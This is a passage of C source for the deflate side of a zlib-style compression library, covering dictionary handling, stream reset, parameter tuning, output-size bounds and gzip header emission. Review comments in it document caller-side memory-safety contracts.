                                           s->status != EXTRA_STATE &&
                                           s->status != NAME_STATE &&
                                           s->status != COMMENT_STATE &&
                                           s->status != HCRC_STATE &&
                                           s->status != BUSY_STATE &&
                                           s->status != FINISH_STATE))
        return 1;
    return 0;
}

/* ========================================================================= */
/* Load a preset dictionary into the window and hash tables.
 *
 * Returns Z_STREAM_ERROR when the stream state is invalid, dictionary is
 * null, the stream uses the gzip wrapper (wrap == 2), a zlib-wrapped stream
 * is no longer in INIT_STATE, or lookahead is non-zero; Z_OK otherwise.
 *
 * dictLength bytes are read from `dictionary` (by adler32() when wrap == 1,
 * and through strm->next_in by fill_window()); the caller is responsible for
 * that buffer really holding dictLength bytes. Only the last w_size bytes
 * are kept when the dictionary is at least as large as the window.
 */
int ZEXPORT deflateSetDictionary(z_streamp strm, const Bytef *dictionary,
                                 uInt  dictLength) {
    deflate_state *s;
    uInt str, n;
    int wrap;
    unsigned avail;
    z_const unsigned char *next;

    if (deflateStateCheck(strm) || dictionary == Z_NULL)
        return Z_STREAM_ERROR;
    s = strm->state;
    wrap = s->wrap;
    if (wrap == 2 || (wrap == 1 && s->status != INIT_STATE) || s->lookahead)
        return Z_STREAM_ERROR;

    /* when using zlib wrappers, compute Adler-32 for provided dictionary */
    if (wrap == 1)
        strm->adler = adler32(strm->adler, dictionary, dictLength);
    s->wrap = 0;                    /* avoid computing Adler-32 in read_buf */

    /* if dictionary would fill window, just replace the history */
    if (dictLength >= s->w_size) {
        if (wrap == 0) {            /* already empty otherwise */
            CLEAR_HASH(s);
            s->strstart = 0;
            s->block_start = 0L;
            s->insert = 0;
        }
        dictionary += dictLength - s->w_size;  /* use the tail */
        dictLength = s->w_size;
    }

    /* insert dictionary into window and hash */
    /* The caller's input pointer and count are saved here, replaced by the
     * dictionary for the duration of the loop, and restored before return.
     */
    avail = strm->avail_in;
    next = strm->next_in;
    strm->avail_in = dictLength;
    strm->next_in = (z_const Bytef *)dictionary;
    fill_window(s);
    while (s->lookahead >= MIN_MATCH) {
        str = s->strstart;
        n = s->lookahead - (MIN_MATCH-1);
        do {
            UPDATE_HASH(s, s->ins_h, s->window[str + MIN_MATCH-1]);
#ifndef FASTEST
            s->prev[str & s->w_mask] = s->head[s->ins_h];
#endif
            s->head[s->ins_h] = (Pos)str;
            str++;
        } while (--n);
        s->strstart = str;
        s->lookahead = MIN_MATCH-1;
        fill_window(s);
    }
    s->strstart += s->lookahead;
    s->block_start = (long)s->strstart;
    s->insert = s->lookahead;
    s->lookahead = 0;
    s->match_length = s->prev_length = MIN_MATCH-1;
    s->match_available = 0;
    strm->next_in = next;
    strm->avail_in = avail;
    s->wrap = wrap;
    return Z_OK;
}

/* ========================================================================= */
/* Copy the current sliding-window contents out to the caller.
 *
 * len is strstart + lookahead, capped at w_size. When `dictionary` is
 * non-null and len is non-zero, len bytes are written to it; when dictLength
 * is non-null it receives len. Returns Z_STREAM_ERROR for an invalid stream
 * state, Z_OK otherwise.
 *
 * There is no capacity argument: the destination must be able to hold up to
 * w_size bytes, because nothing here limits the copy to the caller's buffer.
 */
int ZEXPORT deflateGetDictionary(z_streamp strm, Bytef *dictionary,
                                 uInt *dictLength) {
    deflate_state *s;
    uInt len;

    if (deflateStateCheck(strm))
        return Z_STREAM_ERROR;
    s = strm->state;
    len = s->strstart + s->lookahead;
    if (len > s->w_size)
        len = s->w_size;
    if (dictionary != Z_NULL && len)
        zmemcpy(dictionary, s->window + s->strstart + s->lookahead - len, len);
    if (dictLength != Z_NULL)
        *dictLength = len;
    return Z_OK;
}

/* ========================================================================= */
/* Reset the stream counters, message, pending output and checksum, and put
 * the state back in INIT_STATE (or GZIP_STATE when wrap == 2 and GZIP is
 * defined). The match-finder fields are left alone; lm_init() handles those
 * and is only called from deflateReset(). Returns Z_STREAM_ERROR for an
 * invalid stream state, Z_OK otherwise.
 */
int ZEXPORT deflateResetKeep(z_streamp strm) {
    deflate_state *s;

    if (deflateStateCheck(strm)) {
        return Z_STREAM_ERROR;
    }

    strm->total_in = strm->total_out = 0;
    strm->msg = Z_NULL; /* use zfree if we ever allocate msg dynamically */
    strm->data_type = Z_UNKNOWN;

    s = (deflate_state *)strm->state;
    s->pending = 0;
    s->pending_out = s->pending_buf;

    if (s->wrap < 0) {
        s->wrap = -s->wrap; /* was made negative by deflate(..., Z_FINISH); */
    }
    s->status =
#ifdef GZIP
        s->wrap == 2 ? GZIP_STATE :
#endif
        INIT_STATE;
    strm->adler =
#ifdef GZIP
        s->wrap == 2 ? crc32(0L, Z_NULL, 0) :
#endif
        adler32(0L, Z_NULL, 0);
    /* -2 is the value deflateParams() tests for before flushing. */
    s->last_flush = -2;

    _tr_init(s);

    return Z_OK;
}

/* ===========================================================================
 * Initialize the "longest match" routines for a new zlib stream
 */
/* Sets window_size to twice w_size, clears the hash table, loads the four
 * tuning values from configuration_table[s->level], and zeroes the window
 * position fields. s->level indexes the table without a check here; the
 * level range is validated in deflateInit2_() and deflateParams().
 */
local void lm_init(deflate_state *s) {
    s->window_size = (ulg)2L*s->w_size;

    CLEAR_HASH(s);

    /* Set the default configuration parameters:
     */
    s->max_lazy_match   = configuration_table[s->level].max_lazy;
    s->good_match       = configuration_table[s->level].good_length;
    s->nice_match       = configuration_table[s->level].nice_length;
    s->max_chain_length = configuration_table[s->level].max_chain;

    s->strstart = 0;
    s->block_start = 0L;
    s->lookahead = 0;
    s->insert = 0;
    s->match_length = s->prev_length = MIN_MATCH-1;
    s->match_available = 0;
    s->ins_h = 0;
}

/* ========================================================================= */
/* Full reset: deflateResetKeep() followed, on success, by lm_init(). The
 * result of deflateResetKeep() is returned either way.
 */
int ZEXPORT deflateReset(z_streamp strm) {
    int ret;

    ret = deflateResetKeep(strm);
    if (ret == Z_OK)
        lm_init(strm->state);
    return ret;
}

/* ========================================================================= */
/* Attach a caller-owned gzip header to a gzip-wrapped stream (wrap == 2).
 * Only the pointer is stored; nothing is copied, so the structure and the
 * buffers it points to must stay valid while deflate() writes the header.
 *
 * NOTE(review): s->status is not examined. deflate() dereferences s->gzhead
 * without a null test in its EXTRA/NAME/COMMENT/HCRC states, so replacing
 * the pointer (in particular with Z_NULL) after header output has started
 * is unsafe; callers should set the header before the first deflate() call.
 */
int ZEXPORT deflateSetHeader(z_streamp strm, gz_headerp head) {
    if (deflateStateCheck(strm) || strm->state->wrap != 2)
        return Z_STREAM_ERROR;
    strm->state->gzhead = head;
    return Z_OK;
}

/* ========================================================================= */
/* Report the pending byte count (state->pending) and the bit count
 * (state->bi_valid). Either output pointer may be Z_NULL and is then
 * skipped. Returns Z_STREAM_ERROR for an invalid stream state, else Z_OK.
 */
int ZEXPORT deflatePending(z_streamp strm, unsigned *pending, int *bits) {
    if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
    if (pending != Z_NULL)
        *pending = strm->state->pending;
    if (bits != Z_NULL)
        *bits = strm->state->bi_valid;
    return Z_OK;
}

/* ========================================================================= */
/* Insert the low `bits` bits of `value` into the output bit buffer.
 *
 * Returns Z_STREAM_ERROR for an invalid stream state, Z_BUF_ERROR when bits
 * is outside 0..16 or when sym_buf lies closer than ((Buf_size + 7) >> 3)
 * bytes above pending_out, and Z_OK otherwise.
 *
 * NOTE(review): the sym_buf comparison presumably keeps the flushed bits
 * from running into the symbol buffer overlaid on pending_buf (see the
 * overlay analysis in deflateInit2_) -- confirm.
 */
int ZEXPORT deflatePrime(z_streamp strm, int bits, int value) {
    deflate_state *s;
    int put;

    if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
    s = strm->state;
    if (bits < 0 || bits > 16 ||
        s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
        return Z_BUF_ERROR;
    do {
        /* Take as many bits as the bit buffer still has room for. */
        put = Buf_size - s->bi_valid;
        if (put > bits)
            put = bits;
        s->bi_buf |= (ush)((value & ((1 << put) - 1)) << s->bi_valid);
        s->bi_valid += put;
        _tr_flush_bits(s);
        value >>= put;
        bits -= put;
    } while (bits);
    return Z_OK;
}

/* ========================================================================= */
/* Change the compression level and strategy of an open stream.
 *
 * level and strategy go through the same range checks as in deflateInit2_()
 * before `level` is used as an index into configuration_table. When the
 * strategy or the compress function changes and last_flush is not -2,
 * pending input is first flushed with deflate(strm, Z_BLOCK); Z_BUF_ERROR is
 * returned if input or unflushed window data remains after that call.
 */
int ZEXPORT deflateParams(z_streamp strm, int level, int strategy) {
    deflate_state *s;
    compress_func func;

    if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
    s = strm->state;

#ifdef FASTEST
    if (level != 0) level = 1;
#else
    if (level == Z_DEFAULT_COMPRESSION) level = 6;
#endif
    if (level < 0 || level > 9 || strategy < 0 || strategy > Z_FIXED) {
        return Z_STREAM_ERROR;
    }
    func = configuration_table[s->level].func;

    if ((strategy != s->strategy || func != configuration_table[level].func) &&
        s->last_flush != -2) {
        /* Flush the last buffer: */
        int err = deflate(strm, Z_BLOCK);
        if (err == Z_STREAM_ERROR)
            return err;
        if (strm->avail_in || (s->strstart - s->block_start) + s->lookahead)
            return Z_BUF_ERROR;
    }
    if (s->level != level) {
        if (s->level == 0 && s->matches != 0) {
            if (s->matches == 1)
                slide_hash(s);
            else
                CLEAR_HASH(s);
            s->matches = 0;
        }
        s->level = level;
        s->max_lazy_match   = configuration_table[level].max_lazy;
        s->good_match       = configuration_table[level].good_length;
        s->nice_match       = configuration_table[level].nice_length;
        s->max_chain_length = configuration_table[level].max_chain;
    }
    s->strategy = strategy;
    return Z_OK;
}

/* ========================================================================= */
/* Overwrite the four match-finder tuning values directly.
 *
 * The arguments are stored without any range check; three of them are cast
 * to uInt, so a negative argument becomes a large unsigned value.
 * max_chain_length is the starting count for the hash-chain walk in
 * longest_match(), so a very large value lengthens that walk. Callers
 * should pass values taken from trusted configuration only.
 */
int ZEXPORT deflateTune(z_streamp strm, int good_length, int max_lazy,
                        int nice_length, int max_chain) {
    deflate_state *s;

    if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
    s = strm->state;
    s->good_match = (uInt)good_length;
    s->max_lazy_match = (uInt)max_lazy;
    s->nice_match = nice_length;
    s->max_chain_length = (uInt)max_chain;
    return Z_OK;
}

/* =========================================================================
 * For the default windowBits of 15 and memLevel of 8, this function returns a
 * close to exact, as well as small, upper
bound on the compressed size. This
 * is an expansion of ~0.03%, plus a small constant.
 *
 * For any setting other than those defaults for windowBits and memLevel, one
 * of two worst case bounds is returned. This is at most an expansion of ~4% or
 * ~13%, plus a small constant.
 *
 * Both the 0.03% and 4% derive from the overhead of stored blocks. The first
 * one is for stored blocks of 16383 bytes (memLevel == 8), whereas the second
 * is for stored blocks of 127 bytes (the worst case memLevel == 1). The
 * expansion results from five bytes of header for each stored block.
 *
 * The larger expansion of 13% results from a window size less than or equal to
 * the symbols buffer size (windowBits <= memLevel + 7). In that case some of
 * the data being compressed may have slid out of the sliding window, impeding
 * a stored block from being emitted. Then the only choice is a fixed or
 * dynamic block, where a fixed block limits the maximum expansion to 9 bits
 * per 8-bit byte, plus 10 bits for every block. The smallest block size for
 * which this can occur is 255 (memLevel == 2).
 *
 * Shifts are used to approximate divisions, for speed.
 *
 * NOTE(review): every sum below is plain uLong arithmetic with no overflow
 * test, so for a sourceLen close to the largest uLong the result can wrap to
 * a value smaller than sourceLen. A caller that sizes an output buffer from
 * the return value should reject a result that is less than sourceLen.
 */
uLong ZEXPORT deflateBound(z_streamp strm, uLong sourceLen) {
    deflate_state *s;
    uLong fixedlen, storelen, wraplen;

    /* upper bound for fixed blocks with 9-bit literals and length 255
       (memLevel == 2, which is the lowest that may not use stored blocks) --
       ~13% overhead plus a small constant */
    fixedlen = sourceLen + (sourceLen >> 3) + (sourceLen >> 8) +
               (sourceLen >> 9) + 4;

    /* upper bound for stored blocks with length 127 (memLevel == 1) --
       ~4% overhead plus a small constant */
    storelen = sourceLen + (sourceLen >> 5) + (sourceLen >> 7) +
               (sourceLen >> 11) + 7;

    /* if can't get parameters, return larger bound plus a zlib wrapper */
    if (deflateStateCheck(strm))
        return (fixedlen > storelen ? fixedlen : storelen) + 6;

    /* compute wrapper length */
    s = strm->state;
    switch (s->wrap) {
    case 0:                                 /* raw deflate */
        wraplen = 0;
        break;
    case 1:                                 /* zlib wrapper */
        wraplen = 6 + (s->strstart ? 4 : 0);
        break;
#ifdef GZIP
    case 2:                                 /* gzip wrapper */
        wraplen = 18;
        if (s->gzhead != Z_NULL) {          /* user-supplied gzip header */
            Bytef *str;
            if (s->gzhead->extra != Z_NULL)
                wraplen += 2 + s->gzhead->extra_len;
            /* name and comment are walked up to and including their
             * terminating zero byte; there is no separate length field, so
             * both strings must be zero-terminated by the caller.
             */
            str = s->gzhead->name;
            if (str != Z_NULL)
                do {
                    wraplen++;
                } while (*str++);
            str = s->gzhead->comment;
            if (str != Z_NULL)
                do {
                    wraplen++;
                } while (*str++);
            if (s->gzhead->hcrc)
                wraplen += 2;
        }
        break;
#endif
    default:                                /* for compiler happiness */
        wraplen = 6;
    }

    /* if not default parameters, return one of the conservative bounds */
    if (s->w_bits != 15 || s->hash_bits != 8 + 7)
        return (s->w_bits <= s->hash_bits && s->level ? fixedlen : storelen) +
               wraplen;

    /* default settings: return tight bound for that case -- ~0.03% overhead
       plus a small constant */
    return sourceLen + (sourceLen >> 12) + (sourceLen >> 14) +
           (sourceLen >> 25) + 13 - 6 + wraplen;
}

/* =========================================================================
 * Put a short in the pending buffer. The 16-bit value is put in MSB order.
 * IN assertion: the stream state is correct and there is enough room in
 * pending_buf.
 */
/* Emits the high byte of b first, then the low byte, through put_byte().
 * No room check is made here; the IN assertion above is the caller's job.
 */
local void putShortMSB(deflate_state *s, uInt b) {
    put_byte(s, (Byte)(b >> 8));
    put_byte(s, (Byte)(b & 0xff));
}

/* =========================================================================
 * Flush as much pending output as possible. All deflate() output, except for
 * some deflate_stored() output, goes through this function so some
 * applications may wish to modify it to avoid allocating a large
 * strm->next_out buffer and copying into it. (See also read_buf()).
*/
/* The copy length is the smaller of s->pending and strm->avail_out, so the
 * write to strm->next_out never exceeds the space the caller declared.
 * next_out, pending_out, total_out, avail_out and pending all move by that
 * length, and pending_out is rewound to pending_buf once nothing is left.
 */
local void flush_pending(z_streamp strm) {
    unsigned len;
    deflate_state *s = strm->state;

    _tr_flush_bits(s);
    len = s->pending;
    if (len > strm->avail_out) len = strm->avail_out;
    if (len == 0) return;

    zmemcpy(strm->next_out, s->pending_out, len);
    strm->next_out  += len;
    s->pending_out  += len;
    strm->total_out += len;
    strm->avail_out -= len;
    s->pending      -= len;
    if (s->pending == 0) {
        s->pending_out = s->pending_buf;
    }
}

/* ===========================================================================
 * Update the header CRC with the bytes s->pending_buf[beg..s->pending - 1].
 */
#define HCRC_UPDATE(beg) \
    do { \
        if (s->gzhead->hcrc && s->pending > (beg)) \
            strm->adler = crc32(strm->adler, s->pending_buf + (beg), \
                                s->pending - (beg)); \
    } while (0)

/* ========================================================================= */
/* Main compression entry point: flush pending output, write the zlib or gzip
 * header if it has not been written yet, run the compress function selected
 * by level and strategy, and on Z_FINISH append the trailer.
 *
 * Returns Z_STREAM_ERROR for an invalid stream state, a flush value outside
 * 0..Z_BLOCK, a null next_out, a null next_in with avail_in != 0, or a call
 * after FINISH_STATE with flush != Z_FINISH; Z_BUF_ERROR when avail_out is
 * 0, when there is nothing to do, or when input arrives after the first
 * finish; Z_OK while more calls are needed; Z_STREAM_END when finished.
 *
 * The gzip header states read caller-supplied data through s->gzhead:
 * `extra` for (extra_len & 0xffff) bytes, and `name` and `comment` up to
 * their terminating zero byte. Those buffers have to satisfy that on the
 * caller's side; nothing here can verify their real size.
 */
int ZEXPORT deflate(z_streamp strm, int flush) {
    int old_flush; /* value of flush param for previous deflate call */
    deflate_state *s;

    if (deflateStateCheck(strm) || flush > Z_BLOCK || flush < 0) {
        return Z_STREAM_ERROR;
    }
    s = strm->state;

    if (strm->next_out == Z_NULL ||
        (strm->avail_in != 0 && strm->next_in == Z_NULL) ||
        (s->status == FINISH_STATE && flush != Z_FINISH)) {
        ERR_RETURN(strm, Z_STREAM_ERROR);
    }
    if (strm->avail_out == 0) ERR_RETURN(strm, Z_BUF_ERROR);

    old_flush = s->last_flush;
    s->last_flush = flush;

    /* Flush as much pending output as possible */
    if (s->pending != 0) {
        flush_pending(strm);
        if (strm->avail_out == 0) {
            /* Since avail_out is 0, deflate will be called again with
             * more output space, but possibly with both pending and
             * avail_in equal to zero. There won't be anything to do,
             * but this is not an error situation so make sure we
             * return OK instead of BUF_ERROR at next call of deflate:
             */
            s->last_flush = -1;
            return Z_OK;
        }

    /* Make sure there is something to do and avoid duplicate consecutive
     * flushes. For repeated and useless calls with Z_FINISH, we keep
     * returning Z_STREAM_END instead of Z_BUF_ERROR.
     */
    } else if (strm->avail_in == 0 && RANK(flush) <= RANK(old_flush) &&
               flush != Z_FINISH) {
        ERR_RETURN(strm, Z_BUF_ERROR);
    }

    /* User must not provide more input after the first FINISH: */
    if (s->status == FINISH_STATE && strm->avail_in != 0) {
        ERR_RETURN(strm, Z_BUF_ERROR);
    }

    /* Write the header */
    if (s->status == INIT_STATE && s->wrap == 0)
        s->status = BUSY_STATE;
    if (s->status == INIT_STATE) {
        /* zlib header */
        uInt header = (Z_DEFLATED + ((s->w_bits - 8) << 4)) << 8;
        uInt level_flags;

        if (s->strategy >= Z_HUFFMAN_ONLY || s->level < 2)
            level_flags = 0;
        else if (s->level < 6)
            level_flags = 1;
        else if (s->level == 6)
            level_flags = 2;
        else
            level_flags = 3;
        header |= (level_flags << 6);
        if (s->strstart != 0) header |= PRESET_DICT;
        /* Round the 16-bit header up to the next multiple of 31. */
        header += 31 - (header % 31);

        putShortMSB(s, header);

        /* Save the adler32 of the preset dictionary: */
        if (s->strstart != 0) {
            putShortMSB(s, (uInt)(strm->adler >> 16));
            putShortMSB(s, (uInt)(strm->adler & 0xffff));
        }
        strm->adler = adler32(0L, Z_NULL, 0);
        s->status = BUSY_STATE;

        /* Compression must start with an empty pending buffer */
        flush_pending(strm);
        if (s->pending != 0) {
            s->last_flush = -1;
            return Z_OK;
        }
    }
#ifdef GZIP
    if (s->status == GZIP_STATE) {
        /* gzip header */
        strm->adler = crc32(0L, Z_NULL, 0);
        put_byte(s, 31);
        put_byte(s, 139);
        put_byte(s, 8);
        if (s->gzhead == Z_NULL) {
            put_byte(s, 0);
            put_byte(s, 0);
            put_byte(s, 0);
            put_byte(s, 0);
            put_byte(s, 0);
            put_byte(s, s->level == 9 ? 2 :
                     (s->strategy >= Z_HUFFMAN_ONLY || s->level < 2 ?
                      4 : 0));
            put_byte(s, OS_CODE);
            s->status = BUSY_STATE;

            /* Compression must start with an empty pending buffer */
            flush_pending(strm);
            if (s->pending != 0) {
                s->last_flush = -1;
                return Z_OK;
            }
        }
        else {
            put_byte(s, (s->gzhead->text ? 1 : 0) +
                     (s->gzhead->hcrc ? 2 : 0) +
                     (s->gzhead->extra == Z_NULL ? 0 : 4) +
                     (s->gzhead->name == Z_NULL ? 0 : 8) +
                     (s->gzhead->comment == Z_NULL ? 0 : 16)
                     );
            put_byte(s, (Byte)(s->gzhead->time & 0xff));
            put_byte(s, (Byte)((s->gzhead->time >> 8) & 0xff));
            put_byte(s, (Byte)((s->gzhead->time >> 16) & 0xff));
            put_byte(s, (Byte)((s->gzhead->time >> 24) & 0xff));
            put_byte(s, s->level == 9 ? 2 :
                     (s->strategy >= Z_HUFFMAN_ONLY || s->level < 2 ?
                      4 : 0));
            put_byte(s, s->gzhead->os & 0xff);
            if (s->gzhead->extra != Z_NULL) {
                put_byte(s, s->gzhead->extra_len & 0xff);
                put_byte(s, (s->gzhead->extra_len >> 8) & 0xff);
            }
            if (s->gzhead->hcrc)
                strm->adler = crc32(strm->adler, s->pending_buf,
                                    s->pending);
            s->gzindex = 0;
            s->status = EXTRA_STATE;
        }
    }
    /* From here to HCRC_STATE, s->gzhead is dereferenced without a null
     * test: these states are entered from the non-null branch above.
     */
    if (s->status == EXTRA_STATE) {
        if (s->gzhead->extra != Z_NULL) {
            ulg beg = s->pending;   /* start of bytes to update crc */
            /* Only the low 16 bits of extra_len count, matching the two
             * length bytes written in the header above.
             */
            uInt left = (s->gzhead->extra_len & 0xffff) - s->gzindex;
            /* Copy in pieces that fit what is left of pending_buf. */
            while (s->pending + left > s->pending_buf_size) {
                uInt copy = s->pending_buf_size - s->pending;
                zmemcpy(s->pending_buf + s->pending,
                        s->gzhead->extra + s->gzindex, copy);
                s->pending = s->pending_buf_size;
                HCRC_UPDATE(beg);
                s->gzindex += copy;
                flush_pending(strm);
                if (s->pending != 0) {
                    s->last_flush = -1;
                    return Z_OK;
                }
                beg = 0;
                left -= copy;
            }
            zmemcpy(s->pending_buf + s->pending,
                    s->gzhead->extra + s->gzindex, left);
            s->pending += left;
            HCRC_UPDATE(beg);
            s->gzindex = 0;
        }
        s->status = NAME_STATE;
    }
    if (s->status == NAME_STATE) {
        if (s->gzhead->name != Z_NULL) {
            ulg beg = s->pending;   /* start of bytes to update crc */
            int val;
            /* Bytes are copied until a zero byte has been written; the only
             * stop condition is that terminator in the caller's string.
             */
            do {
                if (s->pending == s->pending_buf_size) {
                    HCRC_UPDATE(beg);
                    flush_pending(strm);
                    if (s->pending != 0) {
                        s->last_flush = -1;
                        return Z_OK;
                    }
                    beg = 0;
                }
                val = s->gzhead->name[s->gzindex++];
                put_byte(s, val);
            } while (val != 0);
            HCRC_UPDATE(beg);
            s->gzindex = 0;
        }
        s->status = COMMENT_STATE;
    }
    if (s->status == COMMENT_STATE) {
        if (s->gzhead->comment != Z_NULL) {
            ulg beg = s->pending;   /* start of bytes to update crc */
            int val;
            /* Same zero-terminated copy as for the name field above. */
            do {
                if (s->pending == s->pending_buf_size) {
                    HCRC_UPDATE(beg);
                    flush_pending(strm);
                    if (s->pending != 0) {
                        s->last_flush = -1;
                        return Z_OK;
                    }
                    beg = 0;
                }
                val = s->gzhead->comment[s->gzindex++];
                put_byte(s, val);
            } while (val != 0);
            HCRC_UPDATE(beg);
        }
        s->status = HCRC_STATE;
    }
    if (s->status == HCRC_STATE) {
        if (s->gzhead->hcrc) {
            if (s->pending + 2 > s->pending_buf_size) {
                flush_pending(strm);
                if (s->pending != 0) {
                    s->last_flush = -1;
                    return Z_OK;
                }
            }
            put_byte(s, (Byte)(strm->adler & 0xff));
            put_byte(s, (Byte)((strm->adler >> 8) & 0xff));
            strm->adler = crc32(0L, Z_NULL, 0);
        }
        s->status = BUSY_STATE;

        /* Compression must start with an empty pending buffer */
        flush_pending(strm);
        if (s->pending != 0) {
            s->last_flush = -1;
            return Z_OK;
        }
    }
#endif

    /* Start a new block or continue the current one.
     */
    if (strm->avail_in != 0 || s->lookahead != 0 ||
        (flush != Z_NO_FLUSH && s->status != FINISH_STATE)) {
        block_state bstate;

        /* Level 0 and the two special strategies have dedicated functions;
         * everything else goes through the configuration table.
         */
        bstate = s->level == 0 ? deflate_stored(s, flush) :
                 s->strategy == Z_HUFFMAN_ONLY ? deflate_huff(s, flush) :
                 s->strategy == Z_RLE ? deflate_rle(s, flush) :
                 (*(configuration_table[s->level].func))(s, flush);

        if (bstate == finish_started || bstate == finish_done) {
            s->status = FINISH_STATE;
        }
        if (bstate == need_more || bstate == finish_started) {
            if (strm->avail_out == 0) {
                s->last_flush = -1; /* avoid BUF_ERROR next call, see above */
            }
            return Z_OK;
            /* If flush != Z_NO_FLUSH && avail_out == 0, the next call
             * of deflate should use the same flush parameter to make sure
             * that the flush is complete. So we don't have to output an
             * empty block here, this will be done at next call. This also
             * ensures that for a very small output buffer, we emit at most
             * one empty block.
             */
        }
        if (bstate == block_done) {
            if (flush == Z_PARTIAL_FLUSH) {
                _tr_align(s);
            } else if (flush != Z_BLOCK) { /* FULL_FLUSH or SYNC_FLUSH */
                _tr_stored_block(s, (char*)0, 0L, 0);
                /* For a full flush, this empty block will be recognized
                 * as a special marker by inflate_sync().
                 */
                if (flush == Z_FULL_FLUSH) {
                    CLEAR_HASH(s);             /* forget history */
                    if (s->lookahead == 0) {
                        s->strstart = 0;
                        s->block_start = 0L;
                        s->insert = 0;
                    }
                }
            }
            flush_pending(strm);
            if (strm->avail_out == 0) {
              s->last_flush = -1; /* avoid BUF_ERROR at next call, see above */
              return Z_OK;
            }
        }
    }

    if (flush != Z_FINISH) return Z_OK;
    if (s->wrap <= 0) return Z_STREAM_END;

    /* Write the trailer */
#ifdef GZIP
    if (s->wrap == 2) {
        /* Four checksum bytes, then the low four bytes of total_in, both
         * least significant byte first.
         */
        put_byte(s, (Byte)(strm->adler & 0xff));
        put_byte(s, (Byte)((strm->adler >> 8) & 0xff));
        put_byte(s, (Byte)((strm->adler >> 16) & 0xff));
        put_byte(s, (Byte)((strm->adler >> 24) & 0xff));
        put_byte(s, (Byte)(strm->total_in & 0xff));
        put_byte(s, (Byte)((strm->total_in >> 8) & 0xff));
        put_byte(s, (Byte)((strm->total_in >> 16) & 0xff));
        put_byte(s, (Byte)((strm->total_in >> 24) & 0xff));
    }
    else
#endif
    {
        putShortMSB(s, (uInt)(strm->adler >> 16));
        putShortMSB(s, (uInt)(strm->adler & 0xffff));
    }
    flush_pending(strm);
    /* If avail_out is zero, the application will call deflate again
     * to flush the rest.
     */
    if (s->wrap > 0) s->wrap = -s->wrap; /* write the trailer only once! */
    return s->pending != 0 ? Z_OK : Z_STREAM_END;
}

/* ========================================================================= */
/* Release the four buffers and the state, then clear strm->state.
 *
 * Returns Z_STREAM_ERROR for an invalid stream state, Z_DATA_ERROR when the
 * stream was still in BUSY_STATE, Z_OK otherwise. Because strm->state is set
 * to Z_NULL, a second call fails deflateStateCheck() and returns
 * Z_STREAM_ERROR instead of freeing the same memory again.
 *
 * NOTE(review): no clearing of the buffers is visible before they are
 * released (TRY_FREE and ZFREE are defined elsewhere -- confirm). The window
 * holds recent uncompressed input, so callers compressing sensitive data may
 * want an allocator whose free routine wipes memory.
 */
int ZEXPORT deflateEnd(z_streamp strm) {
    int status;

    if (deflateStateCheck(strm)) return Z_STREAM_ERROR;

    status = strm->state->status;

    /* Deallocate in reverse order of allocations: */
    TRY_FREE(strm, strm->state->pending_buf);
    TRY_FREE(strm, strm->state->head);
    TRY_FREE(strm, strm->state->prev);
    TRY_FREE(strm, strm->state->window);

    ZFREE(strm, strm->state);
    strm->state = Z_NULL;

    return status == BUSY_STATE ? Z_DATA_ERROR : Z_OK;
}

/* =========================================================================
 * Copy the source state to the destination state.
 * To simplify the source, this is not supported for 16-bit MSDOS (which
 * doesn't have enough memory anyway to duplicate compression states).
*/
/* Returns Z_STREAM_ERROR when MAXSEG_64K is defined, when the source state
 * is invalid, or when dest is null; Z_MEM_ERROR when an allocation fails;
 * Z_OK otherwise.
 *
 * Order matters below. The z_stream and the deflate_state are first copied
 * byte-for-byte, so for a moment dest->state and then ds's buffer pointers
 * alias the source's memory; each is replaced by a fresh allocation (or
 * Z_NULL) before anything on the dest side can be freed.
 */
int ZEXPORT deflateCopy(z_streamp dest, z_streamp source) {
#ifdef MAXSEG_64K
    (void)dest;
    (void)source;
    return Z_STREAM_ERROR;
#else
    deflate_state *ds;
    deflate_state *ss;


    if (deflateStateCheck(source) || dest == Z_NULL) {
        return Z_STREAM_ERROR;
    }

    ss = source->state;

    zmemcpy((voidpf)dest, (voidpf)source, sizeof(z_stream));

    ds = (deflate_state *) ZALLOC(dest, 1, sizeof(deflate_state));
    /* On this failure path dest->state still points at the source's state.
     * A later deflate call on dest is rejected by deflateStateCheck(),
     * because that state's strm back-pointer is the source stream.
     */
    if (ds == Z_NULL) return Z_MEM_ERROR;
    dest->state = (struct internal_state FAR *) ds;
    zmemcpy((voidpf)ds, (voidpf)ss, sizeof(deflate_state));
    ds->strm = dest;

    /* All four buffer pointers inherited from ss are overwritten here. */
    ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
    ds->prev   = (Posf *)  ZALLOC(dest, ds->w_size, sizeof(Pos));
    ds->head   = (Posf *)  ZALLOC(dest, ds->hash_size, sizeof(Pos));
    ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);

    if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
        ds->pending_buf == Z_NULL) {
        /* deflateEnd() only sees dest's own allocations at this point.
         * NOTE(review): relies on TRY_FREE skipping the null entries;
         * its definition is not visible here -- confirm.
         */
        deflateEnd (dest);
        return Z_MEM_ERROR;
    }
    /* following zmemcpy do not work for 16-bit MSDOS */
    zmemcpy(ds->window, ss->window, ds->w_size * 2 * sizeof(Byte));
    zmemcpy((voidpf)ds->prev, (voidpf)ss->prev, ds->w_size * sizeof(Pos));
    zmemcpy((voidpf)ds->head, (voidpf)ss->head, ds->hash_size * sizeof(Pos));
    /* The whole pending_buf is copied, not just the s->pending bytes in
     * use, since sym_buf is overlaid on the same allocation.
     */
    zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);

    /* Pointers into the source's buffers and embedded arrays are rebuilt so
     * that they refer to the copy instead.
     */
    ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
    ds->sym_buf = ds->pending_buf + ds->lit_bufsize;

    ds->l_desc.dyn_tree = ds->dyn_ltree;
    ds->d_desc.dyn_tree = ds->dyn_dtree;
    ds->bl_desc.dyn_tree = ds->bl_tree;

    return Z_OK;
#endif /* MAXSEG_64K */
}

#ifndef FASTEST
/* ===========================================================================
 * Set match_start to the longest match starting at the given string and
 * return its length. Matches shorter or equal to prev_length are discarded,
 * in which case the result is equal to prev_length and match_start is
 * garbage.
